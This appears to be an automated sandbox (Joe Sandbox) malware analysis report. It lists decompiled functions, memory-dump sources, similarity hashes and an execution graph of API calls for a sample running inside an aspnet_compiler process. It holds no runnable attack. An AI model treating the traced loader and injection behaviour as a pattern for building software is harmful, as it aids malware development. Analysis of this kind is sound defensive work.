                                                                                        Function 011D9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction ID: 4711fcd1305425fc11e1ac7f1ebb4e00eaffd089097560edbd904a6bd1a091f1
                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00414077 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 227windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MenuState
                                                                                        • String ID: A$c$g$s$t$u
                                                                                        • API String ID: 1976172297-3813946880
                                                                                        • Opcode ID: 8136e364acbe86a949f0a2c8594e8b4a5e5019a557dbe1ed30f76abe6e5643c4
                                                                                        • Instruction ID: 2f4e2dc9b27c8b382c1d68aee4d94e6006f56163bcf4c6a0a026af3d470861b0
                                                                                        • Opcode Fuzzy Hash: 8136e364acbe86a949f0a2c8594e8b4a5e5019a557dbe1ed30f76abe6e5643c4
                                                                                        • Instruction Fuzzy Hash: 98815FB5D00218AADF50DFA5CC85FEEB3B8BF48304F1441AEF508A7141EB795A898F65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 26%
                                                                                        			E011C645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x128d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E011DFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E011B2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E011AFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x128b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E011DB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                                                        0x011c645b
                                                                                        0x011c6463
                                                                                        0x011c646d
                                                                                        0x011c6475
                                                                                        0x011c647a
                                                                                        0x011c647e
                                                                                        0x011c6480
                                                                                        0x011c648c
                                                                                        0x011c6490
                                                                                        0x011c6495
                                                                                        0x011c6498
                                                                                        0x011c649b
                                                                                        0x011c649f
                                                                                        0x011c64a1
                                                                                        0x01207c07
                                                                                        0x01207c09
                                                                                        0x01207c0c
                                                                                        0x00000000
                                                                                        0x011c64a7
                                                                                        0x011c64a7
                                                                                        0x011c64aa
                                                                                        0x01207bf7
                                                                                        0x01207c00
                                                                                        0x00000000
                                                                                        0x01207bf9
                                                                                        0x01207bf9
                                                                                        0x01207bf9
                                                                                        0x011c64b0
                                                                                        0x011c64b0
                                                                                        0x011c64b2
                                                                                        0x011c64b2
                                                                                        0x011c64b3
                                                                                        0x011c64ba
                                                                                        0x011c6553
                                                                                        0x011c655e
                                                                                        0x011c6566
                                                                                        0x011c656c
                                                                                        0x011c6575
                                                                                        0x011c657f
                                                                                        0x011c6585
                                                                                        0x011c6588
                                                                                        0x011c6588
                                                                                        0x011c64c7
                                                                                        0x011c64cb
                                                                                        0x011c64ce
                                                                                        0x011c64d3
                                                                                        0x011c64da
                                                                                        0x011c64e5
                                                                                        0x011c64ed
                                                                                        0x011c64f1
                                                                                        0x011c64f5
                                                                                        0x011c64f6
                                                                                        0x011c64fa
                                                                                        0x011c6502
                                                                                        0x011c6503
                                                                                        0x011c6504
                                                                                        0x011c6507
                                                                                        0x011c651a
                                                                                        0x011c6524
                                                                                        0x011c6524
                                                                                        0x011c6526
                                                                                        0x011c6526
                                                                                        0x011c64aa
                                                                                        0x011c652c
                                                                                        0x011c652d
                                                                                        0x011c652e
                                                                                        0x011c6539

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: 0$0
                                                                                        • API String ID: 3446177414-203156872
                                                                                        • Opcode ID: 61bf64975a5020403fa2c4b5d14da02c176048272907176ce2f81e26a9e3f175
                                                                                        • Instruction ID: d5ad25295c8d099ca1496c1f006bc0c1e223f60ddc9b2fb647b30fc1d888ae7e
                                                                                        • Opcode Fuzzy Hash: 61bf64975a5020403fa2c4b5d14da02c176048272907176ce2f81e26a9e3f175
                                                                                        • Instruction Fuzzy Hash: 3F415BB16087069FC315CF28C444A1ABBE5BB99B18F04466EF588DB341D771EA05CB86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0122FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 53%
                                                                                        			E0122FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E011DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01225720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01225720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                        0x0122fdda
                                                                                        0x0122fde2
                                                                                        0x0122fde5
                                                                                        0x0122fdec
                                                                                        0x0122fdfa
                                                                                        0x0122fdff
                                                                                        0x0122fe0a
                                                                                        0x0122fe0f
                                                                                        0x0122fe17
                                                                                        0x0122fe1e
                                                                                        0x0122fe19
                                                                                        0x0122fe19
                                                                                        0x0122fe19
                                                                                        0x0122fe20
                                                                                        0x0122fe21
                                                                                        0x0122fe22
                                                                                        0x0122fe25
                                                                                        0x0122fe40

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0122FDFA
                                                                                        Strings
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0122FE2B
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0122FE01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                        • API String ID: 885266447-3903918235
                                                                                        • Opcode ID: e3f93883bb05b7b1510871c3893459e5778967e2df9370e014bb97bad1487b4c
                                                                                        • Instruction ID: 651bee433b7abceec76f708996063d03b66c22a86dda17acd64e4ea5ca893936
                                                                                        • Opcode Fuzzy Hash: e3f93883bb05b7b1510871c3893459e5778967e2df9370e014bb97bad1487b4c
                                                                                        • Instruction Fuzzy Hash: 29F0F672250212BFE7292A45DC02F77BF6AEB44B30F144318F628561E1DAA2FC20D6F0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:7.2%
                                                                                        Dynamic/Decrypted Code Coverage:1.4%
                                                                                        Signature Coverage:1.1%
                                                                                        Total number of Nodes:1167
                                                                                        Total number of Limit Nodes:132
                                                                                        execution_graph 32601 c29540 LdrInitializeThunk 32602 18198d 32605 17df70 32602->32605 32606 17df96 32605->32606 32613 169cc0 32606->32613 32608 17dfa2 32609 17dfc6 32608->32609 32621 168cd0 32608->32621 32653 17cb40 32609->32653 32614 169ccd 32613->32614 32656 169c10 32613->32656 32616 169cd4 32614->32616 32668 169bb0 32614->32668 32616->32608 32622 168cf7 32621->32622 33135 16b170 32622->33135 32624 168d09 33139 16aec0 32624->33139 32626 168d26 32634 168d2d 32626->32634 33184 16adf0 LdrLoadDll 32626->33184 32628 168fdd 32628->32609 32630 168d9c 32630->32628 32631 17e5c0 2 API calls 32630->32631 32632 168db2 32631->32632 32633 17e5c0 2 API calls 32632->32633 32635 168dc3 32633->32635 32634->32628 33143 16df00 32634->33143 32636 17e5c0 2 API calls 32635->32636 32637 168dd4 32636->32637 33155 16c3a0 32637->33155 32639 168de1 32640 176ff0 10 API calls 32639->32640 32641 168df3 32640->32641 32642 176ff0 10 API calls 32641->32642 32643 168e03 32642->32643 32644 168e25 32643->32644 32645 176ff0 10 API calls 32643->32645 32646 176ff0 10 API calls 32644->32646 32652 168e68 32644->32652 32647 168e1e 32645->32647 32649 168e3a 32646->32649 33185 16c4f0 LdrLoadDll 32647->33185 32649->32652 33186 16ce50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 32649->33186 32652->32628 33167 168950 32652->33167 32654 17cb5f 32653->32654 32655 17d460 LdrLoadDll 32653->32655 32655->32654 32687 17b050 32656->32687 32660 169c36 32660->32614 32661 169c2c 32661->32660 32694 17d810 32661->32694 32663 169c73 32663->32660 32705 169a50 32663->32705 32665 169c93 32711 1694b0 LdrLoadDll 32665->32711 32667 169ca5 32667->32614 33110 17db00 32668->33110 32671 17db00 LdrLoadDll 32672 169bdb 32671->32672 32673 17db00 LdrLoadDll 32672->32673 32674 169bf1 32673->32674 32675 16dcc0 32674->32675 32676 16dcd9 32675->32676 33118 16aff0 32676->33118 32678 16dcec 33122 17c670 32678->33122 32682 16dd12 32685 16dd3d 32682->32685 33128 17c6f0 32682->33128 32684 17c920 2 API calls 32686 169ce5 32684->32686 32685->32684 32686->32608 32688 17b05f 32687->32688 32712 177400 32688->32712 32690 169c23 32691 17af00 32690->32691 32692 17af15 32691->32692 32718 17ca90 LdrLoadDll 32691->32718 32692->32661 32695 17d829 32694->32695 32719 176ff0 32695->32719 32697 17d841 32698 17d84a 32697->32698 32758 17d650 32697->32758 32698->32663 32700 17d85e 32700->32698 32775 17c390 32700->32775 33087 167290 32705->33087 32707 169a71 32707->32665 32708 169a6a 32708->32707 33100 167550 32708->33100 32711->32667 32713 17741a 32712->32713 32714 17740e 32712->32714 32713->32690 32714->32713 32717 177880 LdrLoadDll 32714->32717 32716 17756c 32716->32690 32717->32716 32718->32692 32720 177333 32719->32720 32722 177004 32719->32722 32720->32697 32722->32720 32783 17c0e0 32722->32783 32724 177135 32789 17c7f0 32724->32789 32725 177118 32786 17c8f0 32725->32786 32728 177122 32728->32697 32729 17715c 32730 17e3f0 2 API calls 32729->32730 32731 177168 32730->32731 32731->32728 32732 1772f7 32731->32732 32733 17730d 32731->32733 32738 177200 32731->32738 32734 17c920 2 API calls 32732->32734 32846 176d10 32733->32846 32735 1772fe 32734->32735 32735->32697 32737 177320 32737->32697 32739 177267 32738->32739 32741 17720f 32738->32741 32739->32732 32740 17727a 32739->32740 32885 17c770 32740->32885 32743 177214 32741->32743 32744 177228 32741->32744 32884 176bd0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32743->32884 32747 177245 32744->32747 32748 17722d 32744->32748 32747->32735 32804 176990 32747->32804 32792 176c70 32748->32792 32750 17721e 32750->32697 32752 1772da 32889 17c920 32752->32889 32753 17723b 32753->32697 32755 17725d 32755->32697 32757 1772e6 32757->32697 32759 17d66b 32758->32759 32760 17d67d 32759->32760 32923 17e370 32759->32923 32760->32700 32762 17d69d 32926 1765f0 32762->32926 32764 17d6c0 32764->32760 32765 1765f0 3 API calls 32764->32765 32768 17d6e2 32765->32768 32767 17d76a 32769 17d77a 32767->32769 33053 17d3e0 LdrLoadDll 32767->33053 32768->32760 32958 177940 32768->32958 32969 17d250 32769->32969 32772 17d7a8 33048 17c350 32772->33048 32776 17d460 LdrLoadDll 32775->32776 32777 17c3ac 32776->32777 33081 c2967a 32777->33081 32778 17c3c7 32780 17e3f0 32778->32780 33084 17cb00 32780->33084 32782 17d8b9 32782->32663 32892 17d460 32783->32892 32785 1770e9 32785->32724 32785->32725 32785->32728 32787 17d460 LdrLoadDll 32786->32787 32788 17c90c NtDeleteFile 32787->32788 32788->32728 32790 17d460 LdrLoadDll 32789->32790 32791 17c80c NtCreateFile 32790->32791 32791->32729 32793 176c8c 32792->32793 32794 17c770 LdrLoadDll 32793->32794 32795 176cad 32794->32795 32796 176cb4 32795->32796 32797 176cc8 32795->32797 32798 17c920 2 API calls 32796->32798 32799 17c920 2 API calls 32797->32799 32800 176cbd 32798->32800 32801 176cd1 32799->32801 32800->32753 32896 17e600 32801->32896 32803 176cdc 32803->32753 32805 176a0e 32804->32805 32806 1769db 32804->32806 32808 176b59 32805->32808 32812 176a2a 32805->32812 32807 17c770 LdrLoadDll 32806->32807 32809 1769f6 32807->32809 32810 17c770 LdrLoadDll 32808->32810 32811 17c920 2 API calls 32809->32811 32814 176b74 32810->32814 32813 1769ff 32811->32813 32815 17c770 LdrLoadDll 32812->32815 32813->32755 32915 17c7b0 LdrLoadDll 32814->32915 32816 176a45 32815->32816 32818 176a61 32816->32818 32819 176a4c 32816->32819 32820 176a66 32818->32820 32821 176a7c 32818->32821 32823 17c920 2 API calls 32819->32823 32825 17c920 2 API calls 32820->32825 32832 176a81 32821->32832 32903 17e5c0 32821->32903 32822 176bae 32826 17c920 2 API calls 32822->32826 32824 176a55 32823->32824 32824->32755 32828 176a6f 32825->32828 32827 176bb9 32826->32827 32827->32755 32828->32755 32831 176ae7 32833 176afe 32831->32833 32914 17c730 LdrLoadDll 32831->32914 32839 176a93 32832->32839 32906 17c8a0 32832->32906 32835 176b05 32833->32835 32836 176b1a 32833->32836 32837 17c920 2 API calls 32835->32837 32838 17c920 2 API calls 32836->32838 32837->32839 32840 176b23 32838->32840 32839->32755 32841 176b4f 32840->32841 32909 17e1c0 32840->32909 32841->32755 32843 176b3a 32844 17e3f0 2 API calls 32843->32844 32845 176b43 32844->32845 32845->32755 32847 17c770 LdrLoadDll 32846->32847 32848 176d4e 32847->32848 32849 176d57 32848->32849 32850 176d6c 32848->32850 32851 17c920 2 API calls 32849->32851 32852 176d90 32850->32852 32853 176dda 32850->32853 32866 176d60 32851->32866 32854 17c850 2 API calls 32852->32854 32855 176e20 32853->32855 32856 176ddf 32853->32856 32857 176db5 32854->32857 32858 176e32 32855->32858 32865 176fad 32855->32865 32860 17c8a0 2 API calls 32856->32860 32856->32866 32859 17c920 2 API calls 32857->32859 32862 176e37 32858->32862 32871 176e72 32858->32871 32859->32866 32861 176e0a 32860->32861 32863 17c920 2 API calls 32861->32863 32864 17c850 2 API calls 32862->32864 32867 176e13 32863->32867 32868 176e5a 32864->32868 32865->32866 32869 17c920 2 API calls 32865->32869 32866->32737 32867->32737 32872 17c920 2 API calls 32868->32872 32873 176fde 32869->32873 32870 176e77 32870->32866 32875 17c850 2 API calls 32870->32875 32871->32870 32879 176f56 32871->32879 32874 176e63 32872->32874 32873->32737 32874->32737 32876 176e9a 32875->32876 32877 17c920 2 API calls 32876->32877 32878 176ea5 32877->32878 32878->32737 32879->32866 32916 17c850 32879->32916 32882 17c920 2 API calls 32883 176f9e 32882->32883 32883->32737 32884->32750 32886 17d460 LdrLoadDll 32885->32886 32887 1772c2 32886->32887 32888 17c7b0 LdrLoadDll 32887->32888 32888->32752 32890 17d460 LdrLoadDll 32889->32890 32891 17c93c NtClose 32890->32891 32891->32757 32893 17d4e5 32892->32893 32895 17d46f 32892->32895 32893->32785 32894 177400 LdrLoadDll 32894->32893 32895->32893 32895->32894 32899 17cac0 32896->32899 32898 17e61a 32898->32803 32900 17cace 32899->32900 32901 17d460 LdrLoadDll 32900->32901 32902 17cadc RtlAllocateHeap 32901->32902 32902->32898 32904 17cac0 2 API calls 32903->32904 32905 17e5d8 32904->32905 32905->32832 32907 17d460 LdrLoadDll 32906->32907 32908 17c8bc NtReadFile 32907->32908 32908->32831 32910 17e1e4 32909->32910 32911 17e1cd 32909->32911 32910->32843 32911->32910 32912 17e5c0 2 API calls 32911->32912 32913 17e1fb 32912->32913 32913->32843 32914->32833 32915->32822 32917 17c85f 32916->32917 32918 17d460 LdrLoadDll 32917->32918 32919 17c86c 32918->32919 32922 c29560 LdrInitializeThunk 32919->32922 32920 176f95 32920->32882 32922->32920 33054 17c9d0 32923->33054 32925 17e39d 32925->32762 32927 176601 32926->32927 32928 176609 32926->32928 32927->32764 32957 1768dc 32928->32957 33057 17f5a0 32928->33057 32930 17665d 32931 17f5a0 2 API calls 32930->32931 32934 176668 32931->32934 32932 1766b6 32935 17f5a0 2 API calls 32932->32935 32934->32932 32936 17f6d0 3 API calls 32934->32936 33068 17f640 LdrLoadDll RtlAllocateHeap RtlFreeHeap 32934->33068 32937 1766ca 32935->32937 32936->32934 32938 176727 32937->32938 33062 17f6d0 32937->33062 32939 17f5a0 2 API calls 32938->32939 32942 17673d 32939->32942 32941 17677a 32943 17f5a0 2 API calls 32941->32943 32942->32941 32945 17f6d0 3 API calls 32942->32945 32944 176785 32943->32944 32946 17f6d0 3 API calls 32944->32946 32953 1767bf 32944->32953 32945->32942 32946->32944 32948 1768b4 33070 17f600 LdrLoadDll RtlFreeHeap 32948->33070 32950 1768be 33071 17f600 LdrLoadDll RtlFreeHeap 32950->33071 32952 1768c8 33072 17f600 LdrLoadDll RtlFreeHeap 32952->33072 33069 17f600 LdrLoadDll RtlFreeHeap 32953->33069 32955 1768d2 33073 17f600 LdrLoadDll RtlFreeHeap 32955->33073 32957->32764 32959 177951 32958->32959 32960 176ff0 10 API calls 32959->32960 32965 177967 32960->32965 32961 177970 32961->32767 32962 1779a7 32963 17e3f0 2 API calls 32962->32963 32964 1779b8 32963->32964 32964->32767 32965->32961 32965->32962 32966 1779f3 32965->32966 32967 17e3f0 2 API calls 32966->32967 32968 1779f8 32967->32968 32968->32767 33074 17d0e0 32969->33074 32971 17d264 32972 17d0e0 LdrLoadDll 32971->32972 32973 17d26d 32972->32973 32974 17d0e0 LdrLoadDll 32973->32974 32975 17d276 32974->32975 32976 17d0e0 LdrLoadDll 32975->32976 32977 17d27f 32976->32977 32978 17d0e0 LdrLoadDll 32977->32978 32979 17d288 32978->32979 32980 17d0e0 LdrLoadDll 32979->32980 32981 17d291 32980->32981 32982 17d0e0 LdrLoadDll 32981->32982 32983 17d29d 32982->32983 32984 17d0e0 LdrLoadDll 32983->32984 32985 17d2a6 32984->32985 32986 17d0e0 LdrLoadDll 32985->32986 32987 17d2af 32986->32987 32988 17d0e0 LdrLoadDll 32987->32988 32989 17d2b8 32988->32989 32990 17d0e0 LdrLoadDll 32989->32990 32991 17d2c1 32990->32991 32992 17d0e0 LdrLoadDll 32991->32992 32993 17d2ca 32992->32993 32994 17d0e0 LdrLoadDll 32993->32994 32995 17d2d6 32994->32995 32996 17d0e0 LdrLoadDll 32995->32996 32997 17d2df 32996->32997 32998 17d0e0 LdrLoadDll 32997->32998 32999 17d2e8 32998->32999 33000 17d0e0 LdrLoadDll 32999->33000 33001 17d2f1 33000->33001 33002 17d0e0 LdrLoadDll 33001->33002 33003 17d2fa 33002->33003 33004 17d0e0 LdrLoadDll 33003->33004 33005 17d303 33004->33005 33006 17d0e0 LdrLoadDll 33005->33006 33007 17d30f 33006->33007 33008 17d0e0 LdrLoadDll 33007->33008 33009 17d318 33008->33009 33010 17d0e0 LdrLoadDll 33009->33010 33011 17d321 33010->33011 33012 17d0e0 LdrLoadDll 33011->33012 33013 17d32a 33012->33013 33014 17d0e0 LdrLoadDll 33013->33014 33015 17d333 33014->33015 33016 17d0e0 LdrLoadDll 33015->33016 33017 17d33c 33016->33017 33018 17d0e0 LdrLoadDll 33017->33018 33019 17d348 33018->33019 33020 17d0e0 LdrLoadDll 33019->33020 33021 17d351 33020->33021 33022 17d0e0 LdrLoadDll 33021->33022 33023 17d35a 33022->33023 33024 17d0e0 LdrLoadDll 33023->33024 33025 17d363 33024->33025 33026 17d0e0 LdrLoadDll 33025->33026 33027 17d36c 33026->33027 33028 17d0e0 LdrLoadDll 33027->33028 33029 17d375 33028->33029 33030 17d0e0 LdrLoadDll 33029->33030 33031 17d381 33030->33031 33032 17d0e0 LdrLoadDll 33031->33032 33033 17d38a 33032->33033 33034 17d0e0 LdrLoadDll 33033->33034 33035 17d393 33034->33035 33036 17d0e0 LdrLoadDll 33035->33036 33037 17d39c 33036->33037 33038 17d0e0 LdrLoadDll 33037->33038 33039 17d3a5 33038->33039 33040 17d0e0 LdrLoadDll 33039->33040 33041 17d3ae 33040->33041 33042 17d0e0 LdrLoadDll 33041->33042 33043 17d3ba 33042->33043 33044 17d0e0 LdrLoadDll 33043->33044 33045 17d3c3 33044->33045 33046 17d0e0 LdrLoadDll 33045->33046 33047 17d3cc 33046->33047 33047->32772 33049 17d460 LdrLoadDll 33048->33049 33050 17c36c 33049->33050 33080 c29860 LdrInitializeThunk 33050->33080 33051 17c383 33051->32700 33053->32769 33055 17d460 LdrLoadDll 33054->33055 33056 17c9ec NtAllocateVirtualMemory 33055->33056 33056->32925 33058 17f5b6 33057->33058 33059 17f5b0 33057->33059 33060 17e5c0 2 API calls 33058->33060 33059->32930 33061 17f5dc 33060->33061 33061->32930 33063 17f640 33062->33063 33064 17e5c0 2 API calls 33063->33064 33065 17f67a 33063->33065 33067 17f69d 33063->33067 33064->33065 33066 17e3f0 2 API calls 33065->33066 33066->33067 33067->32937 33068->32934 33069->32948 33070->32950 33071->32952 33072->32955 33073->32957 33075 17d0fb 33074->33075 33076 177400 LdrLoadDll 33075->33076 33077 17d11b 33076->33077 33078 177400 LdrLoadDll 33077->33078 33079 17d1cf 33077->33079 33078->33079 33079->32971 33079->33079 33080->33051 33082 c29681 33081->33082 33083 c2968f LdrInitializeThunk 33081->33083 33082->32778 33083->32778 33085 17cb1c RtlFreeHeap 33084->33085 33086 17d460 LdrLoadDll 33084->33086 33085->32782 33086->33085 33088 1672a0 33087->33088 33089 16729b 33087->33089 33090 17e370 2 API calls 33088->33090 33089->32708 33096 1672c5 33090->33096 33091 167328 33091->32708 33092 17c350 2 API calls 33092->33096 33093 16732e 33095 167354 33093->33095 33097 17ca50 2 API calls 33093->33097 33095->32708 33096->33091 33096->33092 33096->33093 33098 17e370 2 API calls 33096->33098 33104 17ca50 33096->33104 33099 167345 33097->33099 33098->33096 33099->32708 33101 167566 33100->33101 33102 17ca50 2 API calls 33101->33102 33103 16756e 33102->33103 33103->32665 33105 17d460 LdrLoadDll 33104->33105 33106 17ca6c 33105->33106 33109 c296e0 LdrInitializeThunk 33106->33109 33107 17ca83 33107->33096 33109->33107 33111 17db23 33110->33111 33114 16aca0 33111->33114 33115 16acc4 33114->33115 33116 169bca 33115->33116 33117 16ad00 LdrLoadDll 33115->33117 33116->32671 33117->33116 33119 16b013 33118->33119 33121 16b090 33119->33121 33133 17c120 LdrLoadDll 33119->33133 33121->32678 33123 17d460 LdrLoadDll 33122->33123 33124 16dcfb 33123->33124 33124->32686 33125 17cc60 33124->33125 33126 17cc7f LookupPrivilegeValueW 33125->33126 33127 17d460 LdrLoadDll 33125->33127 33126->32682 33127->33126 33129 17d460 LdrLoadDll 33128->33129 33130 17c70c 33129->33130 33134 c29910 LdrInitializeThunk 33130->33134 33131 17c72b 33131->32685 33133->33121 33134->33131 33136 16b197 33135->33136 33137 16aff0 LdrLoadDll 33136->33137 33138 16b1fa 33137->33138 33138->32624 33140 16aee4 33139->33140 33187 17c120 LdrLoadDll 33140->33187 33142 16af1e 33142->32626 33144 16df2c 33143->33144 33145 16b170 LdrLoadDll 33144->33145 33146 16df3e 33145->33146 33188 16ddd0 33146->33188 33149 16df71 33152 16df82 33149->33152 33154 17c920 2 API calls 33149->33154 33150 16df59 33151 16df64 33150->33151 33153 17c920 2 API calls 33150->33153 33151->32630 33152->32630 33153->33151 33154->33152 33156 16c3b6 33155->33156 33157 16c3c0 33155->33157 33156->32639 33158 16aff0 LdrLoadDll 33157->33158 33159 16c431 33158->33159 33160 16aec0 LdrLoadDll 33159->33160 33161 16c445 33160->33161 33162 16c468 33161->33162 33163 16aff0 LdrLoadDll 33161->33163 33162->32639 33164 16c484 33163->33164 33165 176ff0 10 API calls 33164->33165 33166 16c4d9 33165->33166 33166->32639 33208 16e1c0 33167->33208 33169 168cc1 33169->32628 33170 16896a 33170->33169 33213 176920 33170->33213 33172 17f5a0 2 API calls 33173 168b65 33172->33173 33175 17f6d0 3 API calls 33173->33175 33174 1689c6 33174->33169 33174->33172 33177 168b7a 33175->33177 33176 167290 4 API calls 33182 168bcd 33176->33182 33177->33182 33286 163660 11 API calls 33177->33286 33182->33169 33182->33176 33183 167550 2 API calls 33182->33183 33216 16c0d0 33182->33216 33266 16e160 33182->33266 33270 16dbc0 33182->33270 33183->33182 33184->32634 33185->32644 33186->32652 33187->33142 33189 16ddea 33188->33189 33197 16dea0 33188->33197 33190 16aff0 LdrLoadDll 33189->33190 33191 16de0c 33190->33191 33198 17c3d0 33191->33198 33193 16de4e 33202 17c410 33193->33202 33196 17c920 2 API calls 33196->33197 33197->33149 33197->33150 